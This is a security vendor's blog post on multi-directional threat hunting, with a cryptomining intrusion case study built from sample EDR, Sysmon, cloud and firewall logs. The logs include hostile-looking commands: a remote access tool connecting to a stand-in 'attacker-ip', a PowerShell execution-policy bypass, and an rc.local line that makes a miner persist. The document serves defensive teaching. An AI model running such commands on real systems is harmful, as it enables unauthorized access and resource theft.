Adaptive Threat Hunting | Adopting a Multi-Directional Approach

Automating the on-demand collection of memory dumps, process information, system files, and event logs for inclusion in threat hunting activities allows for a more comprehensive and proactive approach to adaptive threat hunting. In the WatchTower Threat Hunting blog series, we call out some adaptive threat hunting methodologies including Chained Detections, Multi-Directional Approach, and AI-Powered Hunts. Here we explore the benefits of applying a multi-directional approach to adaptive threat hunting.

The evolution of adaptive threat hunting continues to deliver more ways of automating detection, investigation, and response processes. As these processes continue to integrate threat hunting, digital forensics, incident response, and security operations are converging into a more unified workflow. This shift enables us to move beyond security events and system logs when conducting hunts, incorporating automated collection of more diverse data sources, increasing the fidelity of detections and delivering higher accuracy when determining level of risk.

Beyond Telemetry

In the telemetry-only approach, threat hunting primarily relies on analyzing data from EDR sources originating on a host system. The focus is on identifying suspicious patterns, anomalies, or known indicators of compromise (IoCs) within this telemetry data. While this approach detects many threats, it may not provide a complete picture of advanced or stealthy attacks as it lacks visibility into system memory, event logs, registries, and file system activities. Recognizing the limitations of telemetry-only hunting, organizations move towards a more complete strategy that includes several data sources and incorporate new methods such as chained detections with automated triage in their threat hunting practices.

Sampling is one technique that enables us to have a broader reach, adding speed and scale to our hunts. This consists of automated examination of a selected group of systems to gain deeper insights into potential threats that exist in the environment. These sample systems are often chosen based on initial telemetry detections or suspicious activities. Some may be chosen because they are high value targets that always benefit from more rigorous monitoring and recurring health checks. This sampling of triage scans can include light forensics activities which focus on real-time memory, process, and file system analysis as opposed to imaging an entire disk or performing a full memory dump. These activities are crucial for detecting advanced threats that may not leave obvious traces in telemetry data.

Memory analysis focuses on identifying malicious processes, code injection, and in-memory artifacts that could indicate an active threat. File system analysis involves inspecting files and directories for signs of malware, unauthorized changes, or suspicious file properties. Security tools integration and a performant, centralized data repository becomes critical for implementation of these advanced threat detection activities, which allow for deeper analysis of disparate data.

Specialized security platforms offer these advanced capabilities today to help organizations adopt a holistic, multi-directional approach to adaptive threat hunting. The goal becomes combining the insights from endpoint telemetry data analysis with the findings from triage scans and event logs. This integrated approach provides a more comprehensive view of the threat landscape and helps identify both known and unknown threats.

Understanding the Multi-Directional Approach to Threat Hunting

Threat hunting is inherently exploratory. Security analysts actively search for threats, vulnerabilities, and weaknesses, and explore inventories and learn as much as possible about the environment by asking questions, forming hypotheses, and conducting in-depth investigations. This approach leads to a deeper understanding of the organization’s asset inventory and its security landscape. Here are some key aspects of this new approach that can help guide implementation in your environment.

  • Telemetry Diversity – It starts with leveraging existing EDR telemetry and combining that with additional data sources such as event logs, traffic analysis, cloud activity, forensic data, and application logs to gain a more complete view of the environment and impact.
  • Sweeps and Scans (Sampling) – File system scans and memory sweeps of key systems are critical for uncovering hidden threats such as fileless malware and advanced persistence mechanisms (f.ex. implants). These sweeps involve scanning and analyzing files and memory for malicious patterns and discovering anomalies.
  • LFO (Low Frequency of Occurrence) and Statistics – LFO and statistical analysis help detect subtle, slow-moving threats that may evade traditional security measures. These techniques focus on long-term trends and low-frequency detections that may indicate future compromise.
  • Automation and Manual Investigation – Threat hunting is supported by both automated processes and manual investigation. Automation (see chained detections) helps quickly sift through large datasets and prioritize alerts, while manual investigation allows analysts to triage events or clusters of events of interest, and then delve deeper into complex threats and apply human expertise.
  • Algorithmic Detections (AI and ML)Artificial intelligence and machine learning can deliver algorithms and statistical models used to identify patterns and anomalies through predictive and behavioral analysis. They can identify deviations from normal behavior and alert security teams to potential threats in complex and dynamic environments.

Case Study | A Cryptocurrency Takeover via Cloud Application Exploitation

Attack Overview

In this real-world scenario, a threat actor exploited a vulnerability in a cloud-based application hosted on a public cloud platform. The attacker gained unauthorized access to the application’s underlying operating system, leveraged this initial foothold to escalate privileges, gained control over the cloud infrastructure, and subsequently deployed several virtual machines (VMs) for Bitcoin mining, consuming the organization’s cloud resources.

Initial Detection and EDR Alert

The attack was first detected when an Endpoint Detection and Response (EDR) agent identified anomalous user behavior on the operating system hosting the vulnerable cloud application. The EDR alert was triggered by the unusual use of an administrative account (cloud-admin) to launch remote access tools, which had not been observed previously.

Sample EDR Log (Anomalous User Activity):

Log Name: EDR Security Logs
Source: SentinelOne EDR
Date: 2024-08-05 08:12:34
Event ID: 1001
Task Category: User Activity Monitoring
Level: High
Description: Anomalous user activity detected.

User:
Account Name: cloud-admin
Account Domain: CLOUD
Logon ID: 0x3e7
Privilege Level: Administrator

Activity:
Process: C:\Program Files\RemoteAccessTool\remote.exe
Command Line: "remote.exe -silent -connect attacker-ip -port 443"
Network Connection: Established to IP xxx.xxx.xxx.xxx on port 443

Alert Details: 
The remote access tool was executed by an administrative account that typically does not initiate remote connections.
This activity is flagged as potentially malicious.

An Expanded Investigation Leveraging Multi-Directional Threat Hunting

Realizing the severity of the situation, the threat hunting team expanded their investigation to understand the full scope of the compromise. They utilized multiple data sources, including process execution logs, network traffic analysis, cloud infrastructure logs, and threat intelligence, to piece together the attack timeline.

Process Information and Execution Logs:

  • Analysis: The team analyzed the process execution logs on the compromised server and identified that the attacker had used the cloud-admin account to execute a series of commands designed to escalate privileges and initiate the deployment of additional VMs within the cloud environment.
  • Sample Log (Process Execution via Sysmon):
    Event ID: 1
    Provider: Microsoft-Windows-Sysmon
    TimeCreated: 2024-08-05 08:15:20
    EventDescription: Process Create
    ProcessId: 6720
    Image: C:\Windows\System32\cmd.exe
    CommandLine: "cmd.exe /c powershell -ExecutionPolicy Bypass -File deploy-vm.ps1"
    ParentProcessId: 5504
    User: CLOUD\cloud-admin
    
  • Forensic Artifacts: The attacker utilized a PowerShell script named deploy-vm.ps1, which contained commands to automate the creation and configuration of new VMs in the cloud environment. This script was located in the C:\Windows\Temp\ directory, suggesting that it was temporarily placed by the attacker.
  • Forensic Artifacts: The attacker created a resource group named MinersGroup and deployed multiple VMs with high computational power, specifically designed for cryptocurrency mining. The logs also indicated that these VMs were created in a different geographic region (East U.S.) than the organization’s standard operating region, further raising suspicion.

Cloud Infrastructure Logs:

  • Analysis: Cloud infrastructure logs were reviewed to identify the creation of new resources. The logs revealed that several VMs were spun up shortly after the initial compromise, all under the compromised cloud-admin account.
  • Sample Cloud Log (VM Deployment Event):
    Log Name: Cloud Infrastructure Logs
    Source: Azure Activity Logs
    Date: 2024-08-05 08:20:45
    Event ID: 3000
    Task Category: Virtual Machine Deployment
    Level: Information
    Description: New virtual machine instance created.
    
    User:
    Account Name: cloud-admin
    Subscription ID: 1234abcd-5678-efgh-9012-ijklmnopqrst
    Resource Group: MinersGroup
    
    VM Details:
    VM Name: VM-Miner01
    VM Size: Standard_D4s_v3
    Location: East US
    OS Type: Linux
    Image: UbuntuServer
    Network Interface: NIC01
    
    Activity: VM successfully created and initiated at 08:20:45 UTC.

Network Traffic Analysis:

  • Analysis: network traffic analysis identified communications between the compromised systems and any external IP addresses. They found that the newly deployed VMs were consistently communicating with a known cryptocurrency mining pool’s IP address.
  • Sample Network Log (Firewall):
    Time: 2024-08-05 08:25:00
    Source IP: 10.20.30.40 (VM-Miner01)
    Destination IP: 192.0.2.25 (MiningPool)
    Protocol: TCP
    Destination Port: 3333
    Action: Allow
    Bytes Sent: 50,000,000
    
  • Forensic Artifacts: The continuous outbound traffic to the mining pool’s IP address, particularly over ports commonly used for mining operations (e.g., port 3333), confirmed that the VMs were being used for cryptocurrency mining.

System Files and Configuration Changes:

  • Analysis: The threat hunting team analyzed system files and configuration settings on the compromised server and the newly created VMs. They discovered that the attacker had modified critical configuration files to maintain persistence and avoid detection.
  • Sample System File Change (Linux VM Configuration):
    File: /etc/rc.local
    Modification Time: 2024-08-05 08:30:10
    Content:
    #!/bin/sh -e
    # Custom startup script for mining operations nohup /usr/local/bin/miner --config /etc/miner.conf & exit 0
  • Forensic Artifacts: The modification of the /etc/rc.local file on the Linux VMs ensured that the mining software would start automatically on reboot, providing the attacker with persistent mining operations.

Threat Intelligence Correlation:

  • Analysis: The team leveraged threat intelligence to correlate the attack with known threat actors and campaigns. By analyzing the tools, techniques, and procedures (TTPs) used, they identified the attacker as part of a known cybercrime group that frequently targets cloud environments for cryptocurrency mining.
  • Sample Threat Intelligence Report (Attribution):
    Threat Actor: CryptoMinersGroup
    TTPs:
    - Exploitation of cloud application vulnerabilities
    - Use of compromised administrative credentials
    - Deployment of cryptocurrency mining software on cloud infrastructure
    
    Associated Indicators:
    - C2 Server IP: x.x.x.x
    - Mining Pool IP: x.x.x.x
    - Tools: PsExec, RemoteAccessTool, Custom Miner
    
  • Forensic Artifacts: The correlation of IP addresses and TTPs with known threat intelligence confirmed that the systems within the MinersGroup resource group were compromised and utilized by the attackers, while other parts of the cloud infrastructure remained unaffected.

Lessons Learned

The investigation revealed that the attackers had exploited a vulnerability in a cloud application to gain initial access to the underlying operating system. They escalated privileges, took control of the cloud environment, and deployed multiple VMs for cryptocurrency mining. The hard lessons learned by the security organization include the following.

Secure Configuration and Patch Management:

  • Regularly patch vulnerabilities in cloud applications and underlying infrastructure.
  • Implement strong configurations to minimize attack surfaces.

Continuous Monitoring of Cloud Environments:

  • Use cloud-native security tools and enable comprehensive logging for real-time threat detection.
  • Monitor VM deployments and resource usage to detect abnormal activity early.

Identity Threat Detection and Response (ITDR) and Privileged Access Management (PAM):

  • Implement strict privilege escalation controls to prevent lateral movement.
  • Enforce least-privilege access policies for cloud services.
  • Implement ITDR at the endpoint and CIEM at the cloud level to identify abuses in privilege and lateral movement across the environment.

Scalability of Incident Response:

  • Prepare for large-scale attacks by designing incident response processes to scale with cloud resources.
  • Automate containment and remediation workflows where feasible to reduce impact.

Proactive Cloud Security Posture:

  • Regularly assess cloud configurations and perform security posture reviews.
  • Conduct continuous threat modeling to anticipate potential attack paths.

This case highlights the importance of continuously monitoring cloud infrastructure, promptly patching vulnerabilities, and leveraging comprehensive threat hunting strategies that consider multiple data sources to detect and respond to advanced threats. By automating the collection and correlation of these data sources, the organization was able to quickly identify the compromise, limit the impact, and prevent further exploitation.

Conclusion

Today’s security teams are moving away from a telemetry-only approach to explore more comprehensive, multi-directional threat hunting strategies. By integrating memory, logs, and file system analysis, organizations can proactively identify and respond to a broader spectrum of threats, including those that exploit hidden vulnerabilities within the operating system. This approach not only enhances overall security posture but also significantly reduces the dwell time of threats within the network.

While implementing such an advanced strategy may be challenging for many internal security teams, partnering with our strategic services team PinnacleOne, utilizing the right tools, and engaging experienced service providers makes this attainable over time. SentinelOne’s WatchTower Intelligence-Driven Threat Hunting service enables teams to adopt this proactive methodology, offering comprehensive detection and analysis capabilities that surface both known and unknown threats.

For organizations looking to enhance their threat detection capabilities without burdening internal teams, SentinelOne’s Singularity MDR service offers unprecedented monitoring, threat hunting, and response capabilities. With round-the-clock coverage and the ability to scale detection and response efforts across multiple environments, Singularity MDR ensures that your organization is always one step ahead of attackers.

Learn more about how SentinelOne can empower your security strategy by visiting our WatchTower Threat Hunting and Singularity MDR services pages. Let us help you stay ahead of evolving threats and protect what matters most.